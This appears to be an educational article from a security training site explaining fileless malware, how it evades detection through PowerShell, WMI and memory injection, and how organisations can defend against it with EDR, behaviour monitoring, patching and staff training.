Malware spotlight: Fileless malware
Introduction
Fileless malware is a malicious technique that uses existing software, legitimate applications, operating system files and the authorized protocols of the victim’s machine to achieve their goals. Fileless malware leaves no footprint because it is not a file-based attack that requires the downloading of executable files on the infected system. Rather, this attack is memory-based, and this is why detecting it is a daunting task.
According to Symantec’s 2019 Internet Security Threat Report, fileless malware is growing rapidly. It is now one of the most substantial digital infiltration threats to organizations.
Become a certified reverse engineer!
In this article, we will go through what fileless malware is, its common types and how it works, as well as prevention techniques used to get rid of it.
What are the common types of fileless malware attacks?
Fileless malware attacks are divided into three primary categories:
- Script-based techniques: This may not be completely fileless. However, their detection can be difficult. Examples of these attacks include Operation Cobalt Kitty and SamSam ransomware
- Memory code injection: This technique is used to hide malicious code in the memory of legitimate software programs. Some processes are critical for proper Windows functionality. Fileless malware disseminates and re-injects itself into these processes in order to help hackers accomplish their malicious targets
- Windows registry manipulation: Using this technique, malware attackers utilize a link or malicious file (when clicked on) that involves Windows processes to write and execute fileless malware code into the Windows registry. Poweliks and Kovter are examples of this type of attack
What is the difference between fileless malware and traditional malware?
In the past, the malware was simply an executable file written to perform malicious acts on a victim’s computer. There was an easy solution: the antivirus vendors would create signatures for these files in order to detect static pieces of this malicious code on disk. In 2017, fileless malware emerged, and so began the new age of malware detection and prevention. We could no longer simply rely on signatures to block malware because the malicious payload no longer resided on the victim’s hard drive.
According to the State of Endpoint Security Risk Report published by Ponemon Institute, pieces of fileless malware are evasive threats that distinguish themselves from the traditional malware by limiting their malicious activities solely in the memory of the victim’s computer and avoid leaving any artifact on the file system.
How does fileless malware avoid detection?
Fileless malware attacks are considered evasive in nature for several reasons. First, as said above, fileless malware attacks piggyback on legitimate software and operating system files by executing suspicious activities while the allowed applications continue to run. Secondly, fileless malware resides on the memory, not on the disk. Thirdly, it leaves none of the traditional footprints of a signature that would help antivirus products to detect it. Fileless malware mostly leverages built-in Windows tools such as Windows Management Instrumentation (WMI) and PowerShell to avoid detection.
The whitelisting security approach, which only allows legitimate applications to install, is also useless against fileless attacks. This is because these attacks take advantage of trusted applications that are already on the approved list.
Why do hackers use PowerShell for fileless attacks?
One of the most important reasons hackers use PowerShell for fileless attacks is that it gives them quick access to operating system functions and is accepted as a trusted and legitimate tool. Other reasons include:
- PowerShell is a built-in program on Windows
- The scripts of PowerShell are easy to obfuscate and are difficult to detect with traditional security products
What techniques do hackers use to penetrate your network?
We have already shed light on some techniques hackers use to penetrate your networks, such as through PowerShell or WMI. However, there are several other ways fileless malware can be injected into your computer. They include:
- Attackers often create fraudulent websites that seem legitimate but are actually malicious
- Attackers inject malicious code through by-default, legitimate applications such as JavaScript or Microsoft Office tools
- The malicious payload can also be injected through infected downloads, suspicious links and phishing emails that look trustworthy
Here is the potential chain that hackers may use to compromise your data.
- Cybercriminals send you a spam message that includes a link to a malicious website
- You click on the link
- The infected website loads a Flash player
- Flash player further opens the Windows PowerShell tool
- PowerShell will download and execute a script from a command-and-control (C&C) server
- The PowerShell script finds and sends your data to threat actors
How can I defend against fileless malware attacks?
Though defending against fileless malware attacks is a daunting task due to their evasive nature, several techniques have been developed. Below are some proactive security measures that can help to protect against fileless malware.
Endpoint Detection and Response (EDR)
We need to take a more active approach to our network security. This involves having a next-generation endpoint security solution, which will log all system activity. Threat hunters monitor all activities in information systems. Even if calc.exe has been compromised, they will be able to see that there is suspicious system activity happening under this executable. Custom rules can then be created to hunt for and stop any threats.
More importantly, the EDR should perform real-time monitoring of outgoing and incoming network traffic, phishing emails and unwanted tasks in operations like PowerShell and WMI.
Anti-malware solutions
Many anti-malware solutions also attempt to help in this effort. They do this by creating a dynamic detection-based approach on system activity rather than just static detections.
Patches and updates
Always keep your software applications and operating systems up to date with security patches and latest updates. Unpatched and outdated applications can provide backdoors to hostile actors.
Memory analysis
Since fileless malware resides on the memory, your security solutions should also be capable of performing memory analysis and protection.
Behavior monitoring
Fileless malware often relies on human vulnerability, which means system and user behavior analysis and detection will be a key to security measures. Using a User Behavior Analytics (UBA), you can find hidden threats and increase the accuracy of your security operations while shortening the investigation timelines. Today, behavior monitoring features are offered by many security solutions such as McAfee Enterprise Security Manager.
Integration
Since fileless malware is evasive and sophisticated, you need to deploy multilayered security. This means your security solution must allow the integration of other security tools in order to strengthen your cybersecurity defense against the fileless malware.
Employee training
Train your employees on how to identify suspicious activity, whether it is suspicious emails or web links. Creating internal “phishing tests” is an ongoing need, and you’ll be surprised at how many of your employees will fail these tests.
Conclusion
This article has taken a look at fileless malware, its types, operations and prevention techniques. You can see that fileless malware attacks are evasive and very sophisticated in nature, as they don’t need to be installed on the hard drive like other common malware. Instead, fileless malware stores itself on the memory and uses legitimate applications and operating system processes to perpetrate malicious activities.
Various techniques are available to defend against this attack, which includes installing the next generation EDR solution, antimalware program, behavior analysis techniques, anti-phishing best practices, memory analysis, and patches and upgrades.
Sources
- What is fileless malware and how does it work?, Norton
- What Is Fileless Malware?, McAfee
- How to Stop Fileless Malware: A Deep Dive for Enterprises, Endpoint Security Solutions Review
- How to Protect Against Fileless Malware Attacks, Minerva
- Fileless Malware 101: Understanding Non-Malware Attacks, Cybereason
- What is Fileless Malware?, VMware Carbon Black
- What is a fileless attack? How hackers invade systems without installing software, CSO
- Exam Pass Guarantee
- Live expert instruction
- Hands-on labs
- CREA exam voucher
In this Series
- Malware spotlight: Fileless malware
- How AsyncRAT is escaping security defenses
- Chrome extensions used to steal users' secrets
- Luna ransomware encrypts Windows, Linux and ESXi systems
- Bahamut Android malware and its new features
- LockBit 3.0 ransomware analysis
- AstraLocker releases the ransomware decryptors
- Analysis of Nokoyawa ransomware
- Goodwill ransomware group is propagating unusual demands to get the decryption key
- Dangerous IoT EnemyBot botnet is now attacking other targets
- Fileless malware uses event logger to hide malware
- Nerbian RAT Using COVID-19 templates
- Popular evasion techniques in the malware landscape
- Sunnyday ransomware analysis
- 9 online tools for malware analysis
- Blackguard malware analysis
- Behind Conti: Leaks reveal inner workings of ransomware group
- ZLoader: What it is, how it works and how to prevent it | Malware spotlight [2022 update]
- WhisperGate: A destructive malware to destroy Ukraine computer systems
- Electron Bot Malware is disseminated via Microsoft's Official Store and is capable of controlling social media apps
- SockDetour: the backdoor impacting U.S. defense contractors
- HermeticWiper malware used against Ukraine
- MyloBot 2022: A botnet that only sends extortion emails
- Mars Stealer malware analysis
- How to remove ransomware: Best free decryption tools and resources
- Purple Fox rootkit and how it has been disseminated in the wild
- Deadbolt ransomware: The real weapon against IoT devices
- Log4j - the remote code execution vulnerability that stopped the world
- Rook ransomware analysis
- Modus operandi of BlackByte ransomware
- Emotet malware returns
- Mekotio banker trojan returns with new TTP
- Android malware BrazKing returns
- Malware instrumentation with Frida
- Malware analysis arsenal: Top 15 tools
- Redline stealer malware: Full analysis
- A full analysis of the BlackMatter ransomware
- A full analysis of Horus Eyes RAT
- REvil ransomware: Lessons learned from a major supply chain attack
- Pingback malware: How it works and how to prevent it
- Android malware worm auto-spreads via WhatsApp messages
- Malware analysis: Ragnarok ransomware
- Taidoor malware: what it is, how it works and how to prevent it | malware spotlight
- SUNBURST backdoor malware: What it is, how it works, and how to prevent it | Malware spotlight
- ZHtrap botnet: How it works and how to prevent it
- DearCry ransomware: How it works and how to prevent it
- How criminals are using Windows Background Intelligent Transfer Service
- How the Javali trojan weaponizes Avira antivirus
- HelloKitty: The ransomware affecting CD Projekt Red and Cyberpunk 2077
- DreamBus Botnet: An analysis
- Kobalos malware: A complex Linux threat
Get certified and advance your career
- Exam Pass Guarantee
- Live instruction
- CompTIA, ISACA, (ISC)², Cisco, Microsoft and more!
Malware analysis
Malware analysis
Malware analysis
Malware analysis